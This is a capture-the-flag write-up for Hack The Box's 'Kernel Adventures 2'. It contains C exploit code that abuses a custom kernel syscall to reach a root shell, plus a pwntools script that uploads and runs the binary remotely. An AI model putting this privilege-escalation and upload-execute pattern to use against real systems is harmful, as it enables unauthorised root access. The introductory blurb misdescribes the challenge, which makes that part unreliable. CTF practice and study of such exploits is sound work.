Explore the basics of cybersecurity in the Kernel Adventures 2 Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/258

Description

Apparently Linux authentication is done in userspace? That doesn’t sound safe, time to do it all in the kernel!

Exploitation

Examining the kernel diff, we notice the addition of several new syscalls, including one named magic with syscall number 449.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>

#define MAX_USERS 65535
#define MAGIC_SYS 449

void do_add(char* username, char* password) {
    syscall(MAGIC_SYS, 0, username, password);
}

void do_delete(char* username) {
    syscall(MAGIC_SYS, 2, username);
}

void do_switch(char* username, char* password) {
    syscall(MAGIC_SYS, 3, username, password);
}

int main() {
    char *user = "pwn";
    char *pass = "12pwn34";
    for (int i = 0; i < MAX_USERS; i++) {
        do_add(user, pass);
        if (i == MAX_USERS - 1) {
            do_switch(user, pass);
            char *args[] = {"/bin/sh", NULL};
            execve(args[0], args, NULL);
            return 0;
        }
        do_delete(user);
    }
    for (int i = 0; i < 0xFFFFFFFF; i++) {
        if (syscall(MAGIC_SYS, 0, user, pass) == 0) {
            do_switch(user, pass);
            char *args[] = {"/bin/sh", NULL};
            execve(args[0], args, NULL);
            return 0;
        }
        do_delete(user);
    }
    return 0;
}

Use musl for compilation to produce more compact binaries.

musl-gcc -static -march=x86-64 -Os poc.c -o expl

Use this script to upload, decompress, execute the PoC, and get an interactive session as root.

#!/usr/bin/python3
from pwn import *
import base64,gzip

def get_process():
    try:
        host, port = sys.argv[1].split(':')
        return remote(host, int(port))
    except IndexError:
        print(f'Usage: python {sys.argv[0]} <ip:port>')
        exit(1)

chunk_size = 256
file_name = 'expl'
file_name_encoded = file_name.encode()
with open(file_name, 'rb') as inf:
    exploit = inf.read()
data = base64.b64encode(gzip.compress(exploit))
conn = get_process()
n_chunks = (len(data) + chunk_size - 1) // chunk_size
for i in range(n_chunks):
    print(f'Uploading the exploit: {i + 1}/{n_chunks}')
    conn.recvuntil(b'$')
    conn.sendline(b'echo ' + data[chunk_size*i: (i+1)*chunk_size] + b' >> /home/user/' + file_name_encoded + b'.base64')

print('Uploading the exploit: ' + str(n_chunks) + '/' + str(n_chunks))
conn.sendline(b'cat /home/user/' + file_name_encoded + b'.base64 | base64 -d > /home/user/' + file_name_encoded + b'.gz')
conn.recvuntil(b'$')
conn.sendline(b'cat /home/user/' + file_name_encoded + b'.gz | gzip -d > /home/user/' + file_name_encoded)
conn.recvuntil(b'$')
conn.sendline(b'chmod +x /home/user/' + file_name_encoded)
conn.recvuntil(b'$')
conn.sendline(b'/home/user/' + file_name_encoded)
conn.interactive()

cat /flag.txt

Summary

The Kernel Adventures: Part 2 Challenge on Hack The Box dives into kernel exploitation with a focus on syscall manipulation. This medium-level challenge introduces a custom magic syscall, enabling privilege escalation through user management. By leveraging compact PoC binaries and an efficient upload-execute pipeline, the challenge offers a hands-on experience in advanced exploitation techniques, culminating in root access and system compromise. Perfect for refining skills in kernel-level hacking.